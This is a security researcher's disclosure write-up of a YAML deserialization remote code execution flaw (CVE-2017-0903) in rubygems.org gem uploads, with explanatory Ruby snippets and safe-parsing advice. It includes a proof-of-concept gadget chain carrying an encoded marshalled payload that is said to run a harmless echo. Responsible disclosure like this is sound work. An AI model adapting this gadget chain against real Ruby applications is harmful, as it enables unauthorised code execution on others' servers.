Remote Code Execution on rubygems.org
tl;dr Remote code execution via a deserialization vulnerability on rubygems.org, a very popular hosting service for ruby dependencies. A fix was rolled out quickly. Read the official announcement here. CVE-2017-0903
If you have ever written a ruby application, it is very likely that you have interacted with rubygems.org. You’ve probably even trusted that site to run arbitrary programs on your computer. When you run, for example, gem install rails, the gem utility fetches the rails gem and all of its dependencies from rubygems.org, and installs everything into the appropriate places. Anyone can publish gems there after making an account.
Rubygems.org is itself a rails application with a clearly laid out responsible disclosure policy.
Vulnerability
Ruby gems are actually just tar archives, so running tar -xvf foo.gem will ordinarily leave you with three files:
metadata.gz
data.tar.gz
checksums.yaml.gz
These files are pretty much what they look like. All are gzipped. metadata.gz contains a YAML file with information about the gem like its name, author, version, and so on. data.tar.gz contains another tar archive with all the source code. checksums.yaml.gz contains a YAML file with some cryptographic hashes of the gem’s contents.
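The layout described above can be checked from Ruby as well as from tar. The following is a minimal sketch that builds a stand-in archive in memory (the entry bodies are placeholders, not real gzip data) and lists its entries with the tar reader that ships with rubygems. The helper names build_fake_gem and gem_entry_names are made up for this illustration.

```ruby
require "rubygems/package"
require "stringio"

# Build a tiny tar archive in memory containing the three entry names a
# .gem file normally has. The bodies are placeholders for illustration.
def build_fake_gem
  io = StringIO.new(String.new)
  Gem::Package::TarWriter.new(io) do |tar|
    %w[metadata.gz data.tar.gz checksums.yaml.gz].each do |name|
      body = "placeholder for #{name}"
      tar.add_file_simple(name, 0o644, body.bytesize) { |entry| entry.write(body) }
    end
  end
  io.rewind
  io
end

# Walk the archive and collect the name of every entry, in order.
def gem_entry_names(io)
  names = []
  Gem::Package::TarReader.new(io) do |reader|
    reader.each { |entry| names << entry.full_name }
  end
  names
end

puts gem_entry_names(build_fake_gem)
```

Pointing gem_entry_names at File.open("foo.gem", "rb") instead of the in-memory archive should list the same three names for an ordinary gem.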
I was surprised to learn that parsing untrusted YAML is dangerous. I had always figured it was a benign interchange format like JSON. In fact, YAML allows for the encoding of arbitrary objects, much like python’s pickle.
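To make the difference from JSON concrete, here is a small sketch using a harmless, made-up Point class. A permissive load turns a tagged YAML mapping into an instance of that class, while YAML.safe_load refuses it. The permissive_load helper is an assumption of this example: it picks YAML.unsafe_load where that method exists (newer Psych versions) and falls back to YAML.load otherwise.

```ruby
require "yaml"

# A harmless class standing in for "any class that happens to be loaded".
class Point
  attr_reader :x, :y
end

POINT_DOC = "--- !ruby/object:Point\nx: 1\ny: 2\n"

# Newer Psych versions expose the permissive loader as unsafe_load; on older
# versions plain YAML.load behaves this way.
def permissive_load(yaml)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(yaml) : YAML.load(yaml)
end

# Returns true when safe_load rejects the document because of its class tag.
def safe_load_rejects?(yaml)
  YAML.safe_load(yaml)
  false
rescue Psych::DisallowedClass
  true
end

point = permissive_load(POINT_DOC)
puts point.class                    # the document chose the class, not our code
puts point.x
puts safe_load_rejects?(POINT_DOC)
```

Note that the Point instance is created without its constructor ever running; the loader allocates the object and fills in its instance variables directly.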
When you upload a gem to rubygems.org, the application calls Gem::Package.new(body).spec. The rubygems gem, where this method lives, uses unsafe calls to YAML.load to load the YAML files in the gem.
However, the authors of rubygems.org knew this (probably as a result of this incident), and as of 2013 were monkey-patching the YAML and gem parsing libraries to only allow the deserialization of a whitelist of classes, eventually switching to using Psych.safe_load in 2015.
Unfortunately, the monkey-patching was insufficient, since it only patched the Gem::Specification#from_yaml method. If we check out what actually happens in that call to #spec, we see that it calls #verify, the important parts of which are reproduced below:
# ...
@gem.with_read_io do |io|
  Gem::Package::TarReader.new io do |reader|
    read_checksums reader
    verify_files reader
  end
end
verify_checksums @digests, @checksums
# ...
Then, in #read_checksums:
# ...
Gem.load_yaml
@checksums = gem.seek 'checksums.yaml.gz' do |entry|
  Zlib::GzipReader.wrap entry do |gz_io|
    YAML.load gz_io.read # oops
  end
end
# ...
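For contrast, here is a sketch of what a hardened version of that read could look like. It is not the actual rubygems patch, only an illustration under the assumption that a checksums file needs nothing beyond plain hashes and strings, so YAML.safe_load with no extra classes is enough. The method name read_checksums_safely and the sample documents are invented for this example.

```ruby
require "yaml"
require "zlib"
require "stringio"

# Decompress a gzipped YAML document and parse it with the restricted loader.
def read_checksums_safely(gzipped_yaml)
  Zlib::GzipReader.wrap(StringIO.new(gzipped_yaml)) do |gz_io|
    YAML.safe_load(gz_io.read)
  end
end

# An ordinary checksums document: nested hashes of strings.
benign = Zlib.gzip({ "SHA1" => { "metadata.gz" => "0123abcd" } }.to_yaml)
p read_checksums_safely(benign)

# A document that tries to smuggle in an object tag (harmless class here).
tagged = Zlib.gzip("SHA1: !ruby/object:Object\n  a: 1\n")
begin
  read_checksums_safely(tagged)
rescue Psych::DisallowedClass => e
  puts "rejected: #{e.message}"
end
```

With this shape, the value later passed to the checksum verification can only be built from basic types, so there is no attacker-chosen class for #sort to be called on.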
OK, so we have a call to YAML.load with input that we control. How can we exploit it? Originally I attempted to have my exploit code run at the time of the YAML.load call itself. This turned out to be more challenging than I had anticipated, because although I could deserialize arbitrary objects, the only actual method calls I could make on those objects were very limited. Psych, the YAML parsing library used here, would let me make calls to methods like #[]=, #init_with, and #marshal_load (not Marshal.load; that would have made exploitation much easier). But for most objects, those methods don’t give an attacker much flexibility, since common practice is for them to just initialize a couple variables and return. It seems plausible that there is some object in some standard rails library with a dangerous #[]= method (as there have been in the past), but I didn’t find one.
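The limited set of hooks mentioned above can be observed with two harmless classes. This is a sketch, with Probe and RecordingHash invented for the demonstration: each one only records that the loader called it. The permissive_load helper is again an assumption that selects YAML.unsafe_load on newer Psych versions and YAML.load on older ones.

```ruby
require "yaml"

CALLS = []

# Records the call Psych makes when reviving a tagged object.
class Probe
  def init_with(coder)
    CALLS << [:init_with, coder.map]
  end
end

# Records the call Psych makes for each key of a tagged hash.
class RecordingHash < Hash
  def []=(key, value)
    CALLS << [:[]=, key, value]
    super
  end
end

def permissive_load(yaml)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(yaml) : YAML.load(yaml)
end

permissive_load("--- !ruby/object:Probe\nname: demo\n")
permissive_load("--- !ruby/hash:RecordingHash\ncolor: red\n")

CALLS.each { |call| p call }
```

Both hooks receive only data taken from the document, which is why they are rarely dangerous on their own: a typical implementation just stores what it is given.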
Instead, I looked back at the rubygems.org application. What does it do with that @checksums variable, which we can now set to be an instance of any in-scope class? Over in #verify_checksums:
# ...
checksums.sort.each do |algorithm, gem_digests|
  gem_digests.sort.each do |file_name, gem_hexdigest|
    computed_digest = digests[algorithm][file_name]
# ...
So if we can build an object where calling #sort does something dangerous, we can trigger our exploit. In the end, I came up with the following proof of concept. The payload that actually gets evaled is contained in the base-64 encoded, DEFLATE compressed, marshalled section at the bottom (in this case, it just shells out to run echo "oops"):
SHA1: !ruby/object:Gem::Package::TarReader
  io: !ruby/object:Gem::Package::TarReader::Entry
    closed: false
    header: 'foo'
    read: 0
    io: !ruby/object:ActiveSupport::Cache::MemoryStore
      options: {}
      monitor: !ruby/object:ActiveSupport::Cache::Strategy::LocalCache::LocalStore
        registry: {}
      key_access: {}
      data:
        '3': !ruby/object:ActiveSupport::Cache::Entry
          compressed: true
          value: !binary '\
            eJx1jrsKAjEQRbeQNT4QwQ9Q8hlTRXGL7UTFemMysIGYCZNZ0b/XYsHK8nIO\
            nDtRBGbvJDzxMuRMLABHzIzOSqD0G+jbVMQmhzfLwd4jnphebwUrE0ZAoJrz\
            YQpLE0PCRKGCmSnsWr3p0PW000S56G5eQ91cv9oDpScPC8YyRIG18WOMmGD7\
            /1X1AV+XPlQ='
Starting from the last step and working backwards to the call to #sort:
At the bottom we have an ActiveSupport::Cache::Entry object. The important thing about this object is that when the #value method is called and @compressed is true, it will call Marshal.load on DEFLATE compressed, attacker provided data. The object that is unmarshalled is constructed in such a way that calling just about any method on it will execute the attacker’s code. The exact method used here has been written about before – here is how it works. Unfortunately, we can’t just deserialize this object with YAML to achieve code execution, because it undefs almost all of its methods, including the ones that allow us to set instance variables. It really needs to be loaded with Marshal.load to be useful in this context.
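The lazy decompress-and-unmarshal behavior described above can be sketched with the standard library alone. LazyEntry below is a simplified, hypothetical stand-in, not ActiveSupport's actual class, and the data fed through it is benign. The point it illustrates is that whoever controls the two instance variables controls the bytes handed to Marshal.load.

```ruby
require "zlib"

# Hypothetical stand-in for a cache entry; NOT ActiveSupport's real class.
class LazyEntry
  def initialize(value)
    @value = Zlib::Deflate.deflate(Marshal.dump(value))
    @compressed = true
  end

  # Inflate and unmarshal on demand. Whatever bytes sit in @value are passed
  # straight to Marshal.load, which is the risky part.
  def value
    @compressed ? Marshal.load(Zlib::Inflate.inflate(@value)) : @value
  end
end

# Normal use: the entry compresses its own data.
def honest_entry
  LazyEntry.new({ "answer" => 42 })
end

# What a deserializer does: allocate without running initialize, then set
# the instance variables directly. Benign data is used here.
def forged_entry
  entry = LazyEntry.allocate
  entry.instance_variable_set(:@compressed, true)
  entry.instance_variable_set(:@value, Zlib::Deflate.deflate(Marshal.dump([1, 2, 3])))
  entry
end

p honest_entry.value
p forged_entry.value
```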
Working our way up, the ActiveSupport::Cache::MemoryStore object holds our malicious unmarshalled object in a hash called @data. Its parent class, ActiveSupport::Cache::Store, defines a #read method that calls #read_entry within the MemoryStore. #read_entry basically just grabs the entry out of @data and returns it.
The call to MemoryStore#read comes from a call to Gem::Package::TarReader::Entry#read, which itself is called by Gem::Package::TarReader#each. After the read returns, #size is called on the returned value, which our malicious unmarshalled object does not define, causing our payload to execute.
Finally, because Gem::Package::TarReader specifies include Enumerable, a call to its #sort method will call its #each method, starting the whole chain above.
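That last link in the chain is ordinary Ruby behavior and easy to confirm in isolation. The sketch below uses a made-up Tracer class that includes Enumerable and logs whenever its #each runs; calling #sort on it triggers the log entry.

```ruby
# A made-up class that includes Enumerable and records calls to #each.
class Tracer
  include Enumerable

  attr_reader :log

  def initialize(items)
    @items = items
    @log = []
  end

  # Enumerable builds #sort (and most of its other methods) on top of #each.
  def each
    @log << :each_called
    @items.each { |item| yield item }
  end
end

tracer = Tracer.new([3, 1, 2])
p tracer.sort
p tracer.log
```

Any side effect placed in #each therefore runs as soon as code that expected a plain hash calls #sort on the object.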
Conclusion
For me, one of the takeaways here is that YAML is very powerful, and sometimes used in contexts where less expressive (but safer) interchange formats like JSON might be more appropriate. Perhaps in the future, YAML.load could be modified to take a whitelist of classes as an optional parameter, making the deserialization of complex objects an opt-in behavior. YAML.load in its current state should really be named something like YAML.unsafe_load to get the point across, instead of relying on users to know when they should use YAML.safe_load.
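An opt-in allowlist of this kind can be approximated today with YAML.safe_load. The sketch below assumes a Psych version that accepts the permitted_classes keyword (older releases took the list as a positional argument instead), and load_with_allowlist is a name invented for the example. Psych 4.0 and later also changed YAML.load to be safe by default and added YAML.unsafe_load for the permissive behavior.

```ruby
require "yaml"

# Parse YAML, allowing only basic types plus the explicitly listed classes.
def load_with_allowlist(yaml, allowed = [])
  YAML.safe_load(yaml, permitted_classes: allowed)
end

SYMBOL_DOC = "--- :published\n"

# Symbols are not among the default types, so they must be opted into.
p load_with_allowlist(SYMBOL_DOC, [Symbol])

begin
  load_with_allowlist(SYMBOL_DOC)
rescue Psych::DisallowedClass => e
  puts "rejected: #{e.message}"
end
```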
Thanks very much to the rubygems.org team for running a responsive bug bounty program.
Shameless plug
If you’re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider joining Mastodon! It’s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!